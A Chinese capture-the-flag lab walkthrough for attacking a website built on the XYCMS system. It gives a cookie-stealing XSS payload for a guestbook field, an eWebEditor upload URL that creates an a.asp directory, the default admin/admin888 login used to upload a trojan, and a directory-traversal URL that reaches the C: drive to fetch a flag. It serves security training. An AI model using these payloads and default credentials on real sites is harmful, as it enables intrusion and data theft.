题目21网站漏洞攻击之XYCMS企业建站系统文档格式.docx
《题目21网站漏洞攻击之XYCMS企业建站系统文档格式.docx》由会员分享,可在线阅读,更多相关《题目21网站漏洞攻击之XYCMS企业建站系统文档格式.docx(6页珍藏版)》请在冰豆网上搜索。
描述:
公司搭建了门户网站,使用了XYCMS企业建站系统。
但是经过一段时间的运营,发现公司网站经常受到黑客的攻击,给公司造成了很大的不便和损失。
上级领导要求尽快查清原因,作为网络安全维护人员,请查找公司网站可能存在的一些漏洞至少两个。
答案提交:
1、请提交获取的key值。
参考步骤:
1.进入关卡二十一,点击查看IP地址获取靶机IP
2.获得的靶机IP地址
3.打开场景工具WindowXp
4.进入xp渗透攻击机,打开浏览器浏览将要攻击的网站
5.SQL注入
使用“啊D注入工具”对网站进行漏洞测试
继续对注入点进行SQL注入,但没有发现可利用的信息,表明此处无漏洞。
6.XSS漏洞利用
(1)在留言本-留言标题中插入XSS脚本,<
script>
window.alert(document.cookie);
<
/script>
(2)返回带有cookie的提示窗
7.编辑器漏洞利用
(1)利用编辑器漏洞进行在网站上生产a.asp目录
http:
//172.16.1.62/admin/xyewebeditor/asp/upload.asp?
action=save&
type=image&
style=popup&
cusdir=a.asp
(2)编辑器管理界面的路径默认:
//172.16.1.62/admin/xyeWebEditor/admin/login.asp
在浏览器中打开此地址
(3)输入ewebeditor默认用户名admin密码admin888登录管理如下:
然后就可以对样式进行管理上传自己制作的木马程序
(4)编辑器默认目录遍历地址:
//192.168.1.62/admin/xyeWebEditor/admin/upload.asp?
id=1&
d_viewmode=list&
dir=../并在浏览器中打开此地址
(5)利用编辑器默认目录遍历漏洞http:
dir=../../../访问到C盘根目录获取的key